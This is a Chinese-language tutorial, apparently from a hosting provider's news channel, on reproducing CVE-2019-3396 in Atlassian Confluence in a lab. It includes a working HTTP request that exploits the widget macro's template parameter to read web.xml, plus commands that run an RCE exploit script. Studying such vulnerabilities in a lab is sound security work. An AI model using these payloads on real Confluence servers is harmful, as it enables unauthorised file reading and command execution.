您好,登錄后才能下訂單哦!
Atlassian Confluence路徑穿越與命令執行漏洞CVE-2019-3396怎么復現,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
Atlassian Confluence是企業廣泛使用的wiki系統,其6.14.2版本前存在一處未授權的目錄穿越漏洞,通過該漏洞,攻擊者可以讀取任意文件,或利用Velocity模板注入執行任意命令。
影響版本
Confluence 1.*.*、2.*.*、3.*.*、4.*.*、5.*.* Confluence 6.0.*、6.1.*、6.2.*、6.3.*、6.4.*、6.5.* Confluence 6.6.* < 6.6.12 Confluence6.7.*、6.8.*、6.9.*、6.10.*、6.11.* Confluence 6.12.* < 6.12.3 Confluence 6.13.* < 6.13.3 Confluence 6.14.* < 6.14.2
當前系統環境Confluence Server 6.10.2:
環境啟動后,訪問http://your-ip:8090會進入安裝引導,選擇“Trial installation”
之后會要求填寫license key。
點擊“Get an evaluation license”,(需gmail賬號)去Atlassian官方申請一個Confluence Server的測試證書(不要選擇Data Center和Addons):
確認安裝的ip
然后點擊Next安裝 。(建議使用4G內存以上的機器進行安裝與測試)本人是8G親測可以
配置系統管理員賬戶
裝完成之后 新建一個話題,然后,其他宏>小工具連接器
編輯抓包
任意文件讀取
發送如下poc,即可讀取文件web.xml:
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: xxx.xxx.xxx:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Content-Length: 168
Origin: http://xxx.xxx.xxx.xxx:8090
Connection: close
Referer: http://xxx.xxx.xxx.xxx:8090/pages/resumedraft.action?draftId=65587&draftShareId=3aae85b8-030c-44bb-b8f4-d33a1771591c
{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
命令執行
python -m pyftpdlib -p 21
python RCE_exp.py http://xxx.xx.xx.xx:8090 "whoami"
看完上述內容,你們掌握Atlassian Confluence路徑穿越與命令執行漏洞CVE-2019-3396怎么復現的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。